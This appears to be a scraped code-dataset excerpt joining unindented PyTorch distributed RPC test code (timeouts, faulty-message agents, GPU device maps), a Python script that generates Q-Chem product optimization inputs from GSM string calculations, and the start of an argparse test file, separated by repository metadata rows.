self.assertEqual(int(info["agent.num_pending_requests"]), 1)
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREAD)
num_idle_threads = int(info["agent.num_idle_threads"])
# as we cannot know for sure whether the send thread has returned, there
# might be either 1 or 2 busy threads
self.assertTrue(num_idle_threads in [NUM_THREAD - 1, NUM_THREAD - 2])
# add a barrier to make sure the request is not finished before checking
# num_pending_requests
dist.barrier()
DONE_FUTURE.set_result(self.rank)
self.assertEqual(dst_rank, fut.wait())
# add a barrier to make sure the dst_rank has finished processing the
# request
dist.barrier()
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.num_pending_requests", info)
self.assertIn("agent.thread_pool_size", info)
self.assertIn("agent.num_idle_threads", info)
self.assertEqual(int(info["agent.num_pending_requests"]), 0)
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREAD)
for retry in range(3):
# even if the future has completed, there is no guarantee that
# the local send/recv threads would have finished. We try three
# times. (NB: this might potentially be flaky. If flakiness does
# occur, then we have to relax the assert.)
info = rpc.api._get_current_rpc_agent().get_debug_info()
if int(info["agent.num_idle_threads"]) == NUM_THREAD:
break
time.sleep(0.1)
self.assertEqual(int(info["agent.num_idle_threads"]), NUM_THREAD)
# add a barrier to make sure SHUTDOWN message is not sent
dist.barrier()
@dist_init(setup_rpc=False)
def test_set_and_get_num_send_recv_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_process_group_set_default_timeout(self):
timeout = 0.5
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=self.rpc_backend_options.num_send_recv_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_process_group_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing ProcessGroupRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=self.rpc_backend_options.num_send_recv_threads,
rpc_timeout=timeout,
)
class FaultyAgentRpcTest(RpcAgentTestFixture):
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init(messages_to_delay={})
def test_check_failed_messages(self):
if self.rank == 0:
dst_worker_b = worker_name((self.rank + 1) % self.world_size)
dst_worker_c = worker_name((self.rank + 2) % self.world_size)
# Worker0 sends RPC to Worker1 and creates an RRef there
rref = rpc.remote(dst_worker_b, torch.add, args=(torch.ones(2, 2), torch.ones(2, 2)))
# Worker0 sends an RPC to Worker2 with the RRef as an arg
rpc.remote(dst_worker_c, add_rref_to_value, args=(rref, torch.ones(2, 2)))
# check if the output is as expected
self.assertEqual(rref.to_here(), torch.add(torch.ones(2, 2), torch.ones(2, 2)))
# explicitly delete all User RRefs
_delete_all_user_and_unforked_owner_rrefs()
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_PROCESS_GROUP)
self.assertEqual(self.rpc_backend_options.num_send_recv_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
self.assertEqual(len(self.rpc_backend_options.messages_to_delay), 2)
self.assertEqual(self.rpc_backend_options.rpc_timeout, rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"])
def test_custom_faulty_messages(self):
self.assertEqual(
set(["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"]),
set(self.rpc_backend_options.messages_to_fail),
)
@dist_init(faulty_messages=[])
def test_no_faulty_messages(self):
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 0)
@dist_init(messages_to_delay={"SCRIPT_CALL": 1.5})
def test_custom_messages_to_delay(self):
self.assertEqual(self.rpc_backend_options.messages_to_delay, {"SCRIPT_CALL": 1.5})
def _test_remote_message_dropped_pickle(self, dst=None):
if self.rank != 0:
return
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, my_sleep_func, args=(1,))
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Attempt to fork the RRef should raise an error indicating the rpc.remote timeout.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref._serialize()
# Test that using RRef as arg over RPC (which forks) results in the same
# error
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 1))
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle(self):
self._test_remote_message_dropped_pickle()
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle_to_self(self):
self._test_remote_message_dropped_pickle(self.rank)
def _test_remote_message_dropped_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# test the case where rpc.remote() message creation is completely dropped.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, func, args=args)
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Note: during shutdown, logs will indicate "Could not find OwnerRRef..."
# on the owning nodes, this is expected because the OwnerRRef was never
# successfully created. Therefore, delAllUsers will work as expected.
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args, dst=0)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout_to_self(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args, dst=0)
def _test_remote_message_delay_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# Test the case where remote message is eventually processed on the owner,
# but the future on the creator times out before the response comes back.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, func, args=args, timeout=0.001)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# to_here() should now pick up that rpc.remote() creation has failed.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Test the case where rpc.remote() times out, but to_here() has already
# started blocking before.
# NOTE: we only test this when not sending to self, as to_here() calls
# calls localValue(), which does not send an RPC and thus does not have
# a timeout. This can be supported by allowing future.wait() to
# take in an optional timeout (https://github.com/pytorch/pytorch/issues/39280)
if dst_rank != self.rank:
slow_rref = rpc.remote(dst_worker, func, args=args, timeout=2)
with self.assertRaisesRegex(RuntimeError, expected_error):
# to_here() should raise timeout error, since it does not know about the
# status of rpc.remote().
slow_rref.to_here(0.001)
# Note: If we proceed with shutdown, UserRRef will send out a RRefUserDelete
# but this can be a noop since it may not exist on the owner yet. Later,
# the owner can process the RRef creation and wait for the delete message,
# thus leading to a timeout.
# Therefore, we wait until we get notification that pending owners have
# been confirmed before sending out RRefUserDeletes.
if dst_rank != self.rank:
wait_until_owners_and_forks_on_rank(2, 2, rank=dst_rank)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_delay_timeout(func, args)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout_to_self(self):
func = my_sleep_func
args = (1,)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout_to_self(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
def test_rref_to_here_timeout(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref.to_here(0.01)
rref.to_here()
@dist_init(faulty_messages=[])
def test_rpc_builtin_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
# PYTHON_CALL message types which correspond to Python UDF over RPC
# by default get a delay (see faulty_rpc_agent_test_fixture)
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(
dst_worker,
torch.add,
args=(torch.tensor(1), torch.tensor(1)),
timeout=1,
)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=1
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_rpc_script_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
fut = rpc.rpc_async(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
class TensorPipeAgentRpcTest(RpcAgentTestFixture):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# TensorPipeRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `TensorPipeRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.init_method
)
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.TensorPipeAgent)
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_set_and_get_num_worker_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_set_default_timeout(self):
timeout = 0.5
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing TensorPipeRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout,
)
def _test_device_maps(self, options, errMsg="Invalid device_map"):
with self.assertRaisesRegex(ValueError, errMsg):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
self.assertFalse(rpc.api._is_current_rpc_agent_set())
@skip_if_lt_x_gpu(2)
def test_device_maps_wrong_worker_name(self):
options = self.rpc_backend_options
options.set_device_map("none_exist", {0: 1})
self._test_device_maps(options, "Wrong worker names")
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_local_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {torch.cuda.device_count(): 0})
self._test_device_maps(options)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_remote_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: torch.cuda.device_count()})
self._test_device_maps(options)
@skip_if_lt_x_gpu(2)
def test_device_maps_many_to_one(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
options.set_device_map(dst, {0: 0})
self._test_device_maps(options)
@skip_if_lt_x_gpu(2)
def test_device_maps_one_to_many(self):
if self.rank == 0:
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1})
with self.assertRaisesRegex(
ValueError, "`set_device_map` only supports 1-to-1 mapping"
):
options.set_device_map(dst, {0: 0})
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_min_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {-1: 0})
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {0: -1})
@staticmethod
def _gpu_add(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 1]):
return (x + y).to(0)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_gpu(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1, 1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentRpcTest._gpu_add,
args=(torch.zeros(2).to(0), torch.ones(2).to(0))
)
self.assertEqual(ret.device, torch.device(1))
self.assertEqual(ret, (torch.zeros(2) + torch.ones(2)).to(1))
rpc.shutdown()
@staticmethod
def _gpu_add_multi_gpu(x, y):
if all([x.is_cuda, x.device.index == 0, y.is_cuda, y.device.index == 1]):
return x + y.to(0), x.to(1) - y
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_multi_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {1: 0})
options.set_device_map(dst, {0: 1})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentRpcTest._gpu_add_multi_gpu,
args=(torch.zeros(2).to(1), torch.ones(2).to(0))
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_multi_gpu(dst)
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_multi_gpu(dst)
@staticmethod
def _gpu_add_return_to_gpu(x, y):
if x.device.type == 'cpu' and y.device.type == 'cpu':
return (x + y).to(0), (x - y).to(1), (x * y).to(2), (x / y).to(3)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_in_options(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
init_method=options.init_method,
num_worker_threads=options.num_worker_threads,
device_maps={dst: {0: 1, 1: 0}}
)
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentRpcTest._gpu_add_multi_gpu,
args=(torch.zeros(2).to(1), torch.ones(2).to(0))
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
def _test_device_maps_return_to_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 2})
options.set_device_map(dst, {2: 3})
options.set_device_map(dst, {3: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentRpcTest._gpu_add_return_to_gpu,
args=(torch.zeros(2), torch.ones(2))
)
for i in range(len(rets)):
self.assertEqual(rets[i].device, torch.device((3 + i) % 4))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(3))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
self.assertEqual(rets[2], (torch.zeros(2) * torch.ones(2)).to(1))
self.assertEqual(rets[3], (torch.zeros(2) / torch.ones(2)).to(2))
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_return_to_gpu(dst)
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_return_to_gpu(dst)
@staticmethod
def _add_to_gpu(x, y):
return (x + y).to(0)
def _test_device_maps_missing_config(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = (
"TensorPipe RPC backend only supports CPU tensors by default.*"
"`set_device_map` on `TensorPipeRpcBackendOptions`"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(dst, torch.add, args=(torch.zeros(2).to(0), 1))
elif mode == RPCExecMode.REMOTE:
rpc.remote(dst, torch.add, args=(torch.zeros(2).to(0), 1)).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
def _test_device_maps_missing_config_response(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = "Response device mapping is not available"
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(
dst,
TensorPipeAgentRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
elif mode == RPCExecMode.REMOTE:
rpc.remote(
dst,
TensorPipeAgentRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config(self):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
def test_device_maps_missing_config_not_timeout(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options
)
timeout = rpc.get_rpc_timeout()
tik = time.time()
self._test_device_maps_missing_config(RPCExecMode.SYNC)
rpc.shutdown()
tok = time.time()
self.assertTrue(tok - tik < timeout)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote(self):
self._test_device_maps_missing_config(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(2)
def test_device_maps_remote(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(
dst,
TensorPipeAgentRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
self.assertEqual(rref.to_here(), torch.ones(2).to(1))
rpc.shutdown()
| [
"[email protected]"
] | |
b75806926dcb3bbbf4251fca79a3bd28f9300dab | 71b86fc54e811c3a06d6d2db32a65a212f642bac | /scripts/create_prod_optfreq_jobs.py | 298897a5ec19bd62538151015a4d4e84b1ae396f | [
"MIT"
] | permissive | yunsiechung/ard_gsm | c773f4454836b54f6bb788c8d038d60d628ffcf2 | 82826011b0edf7122e16063094b04ecd16bf1cf5 | refs/heads/master | 2021-05-20T12:01:32.981441 | 2020-01-20T17:08:31 | 2020-01-20T17:08:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,879 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import argparse
import glob
import os
import re
from ard_gsm.qchem import QChem
from ard_gsm.util import iter_sub_dirs, read_xyz_file
def main():
args = parse_args()
num_regex = re.compile(r'\d+')
maxnum = float('inf') if args.maxnum is None else args.maxnum
for gsm_sub_dir in iter_sub_dirs(args.gsm_dir, pattern=r'gsm\d+'):
gsm_num = int(num_regex.search(os.path.basename(gsm_sub_dir)).group(0))
if gsm_num > maxnum:
continue
out_dir = os.path.join(args.out_dir, os.path.basename(gsm_sub_dir))
if not os.path.exists(out_dir):
os.makedirs(out_dir)
elif not args.overwrite:
continue
qstart_file = os.path.join(gsm_sub_dir, 'qstart')
qtmp = QChem(logfile=qstart_file)
charge, multiplicity = qtmp.get_charge(), qtmp.get_multiplicity()
print(f'Extracting from {gsm_sub_dir}...')
for gsm_log in glob.iglob(os.path.join(gsm_sub_dir, 'gsm*.out')):
num = int(num_regex.search(os.path.basename(gsm_log)).group(0))
string_file = os.path.join(gsm_sub_dir, f'stringfile.xyz{num:04}')
if not (os.path.isfile(string_file) and os.path.getsize(string_file) > 0):
continue
if args.ignore_errors and has_error(gsm_log):
continue
if args.ignore_errors or is_successful(gsm_log):
# Optimize van-der-Waals wells instead of separated products
# Also check if product optimization during GSM failed
xyzs = read_xyz_file(string_file, with_energy=True)
last_energy = xyzs[-1][-1]
second_to_last_energy = xyzs[-2][-1]
if last_energy > second_to_last_energy: # Something went wrong in product optimization
continue
path = os.path.join(out_dir, f'prod_optfreq{num:04}.in')
q = QChem(config_file=args.config)
q.make_input_from_coords(path, *xyzs[-1][:-1], charge=charge, multiplicity=multiplicity, mem=args.mem)
def is_successful(gsm_log):
"""
Success is defined as having converged to a transition state.
"""
with open(gsm_log) as f:
for line in reversed(f.readlines()):
if '-XTS-' in line or '-TS-' in line:
return True
return False
def has_error(gsm_log):
"""
Check if last node is high in energy or if the path is dissociative.
"""
with open(gsm_log) as f:
for line in reversed(f.readlines()):
if 'high energy' in line and '-exit early-' in line:
return True
if 'terminating due to dissociation' in line:
return True
return False
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('gsm_dir', metavar='GSMDIR', help='Path to directory containing GSM folders')
parser.add_argument('out_dir', metavar='ODIR', help='Path to output directory')
parser.add_argument('--mem', type=int, metavar='MEM', help='Q-Chem memory')
parser.add_argument('--overwrite', action='store_true', help='Overwrite input files in existing directories')
parser.add_argument('--maxnum', type=int, metavar='NUM', help='Only make jobs from GSM folders up to this number')
parser.add_argument('--ignore_errors', action='store_true',
help='Extract from all GSM calculations ignoring (most) errors')
parser.add_argument(
'--config', metavar='FILE',
default=os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir, 'config', 'qchem.opt_freq'),
help='Configuration file for product optfreq jobs in Q-Chem'
)
return parser.parse_args()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
5f2d1ac25562db38ab4a821c2566217b269f5519 | f8ab044c34f0d286195c8e5abfae6f451e6c8223 | /test_arg.py | 58c8a56dafab815d14bbf764635a534ade273ed5 | [] | no_license | liuyug/pytest | aa512e902cf4ba9afb91b6b5b5c5cb9dccdc6478 | ffc14dbee70ff6fd9c8ab63a1c771fddc8bf5491 | refs/heads/master | 2020-05-19T12:20:57.958939 | 2016-09-06T03:01:38 | 2016-09-06T03:01:38 | 15,447,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 996 | py | #!/usr/bin/env python
# -*- encoding:utf-8 -*-
import argparse
import unittest
